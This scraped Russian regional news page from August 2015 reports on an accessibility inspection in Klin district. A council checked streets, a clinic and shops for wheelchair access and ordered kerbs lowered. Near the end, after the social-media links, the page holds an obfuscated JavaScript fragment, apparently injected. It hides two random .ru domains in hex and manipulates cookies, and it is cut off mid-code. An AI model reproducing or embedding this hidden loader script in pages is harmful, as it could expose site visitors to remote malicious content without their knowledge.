Обратная связь

Напишите свои пожелания/замечания по содержанию и работе сайта.




Новости

Главные события подмосковья

Госуслуги МО Новости Правительства МО
Назад к списку новостей

Совет по делам инвалидов в Клинском районе провел проверку доступной среды

Совет по делам инвалидов в Клинском районе провел проверку доступной среды
21 августа 2015 17:14 Распечатать

Координационный совет по делам инвалидов в Клинском районе Московской области провел проверку доступной среды, сделаны письменные предписания в адрес ряда дорожных организаций с требованием понизить уровень бордюрного камня и в адрес частных объектов, не обеспечивающих исполнение требований по доступности для колясочников, сообщает пресс-служба районной администрации.

«По поручению главы Клинского муниципального района Алены Сокольской координационным советом по делам инвалидов при администрации Клинского района была проведена комиссионная проверка улиц города и объектов инфраструктуры на предмет удобства для людей с ограниченными возможностями. В первый день проверки комиссия прошла по маршруту от Ледового дворца, по улице Бородинский проезд, Сестрорецкому парку, улице Мира», – говорится в сообщении.

Как отмечается в материале, 20 августа комиссия проверила маршрут от улицы Старой Ямской до поликлиники № 3. Было отмечено, что на таких объектах, как Ледовый дворец и комплекс «Клинское подворье», условия доступной среды соответствуют всем требованиям.

Есть значительные изменения в обустройстве поликлиники № 3, где кроме пандуса капитально отремонтирована въездная группа, туалетная комната оборудована для колясочников, им также предоставляется возможность воспользоваться лифтом, уточняется в сообщении.

По данным пресс-службы, членами координационного совета были сделаны письменные предписания в адрес ряда дорожных организаций с требованием понизить уровень бордюрного камня и в адрес частных объектов, не обеспечивающих исполнение требований по доступности для колясочников (в частности, ТЦ «Юбилейный» и «Дикси» на Бородинском проезде). На следующей неделе работа координационного совета по данному вопросу будет продолжена.

Почти 10,4 миллиона рублей потратят на создание доступной среды в Ленинском районе в 2015 году

Следите за новостями Подмосковья в группах VKontakte, Facebook, Odnoklassniki, Twitter, LiveJournal и YouTube

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19694",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Источник: пресс-служба администрации Клинского района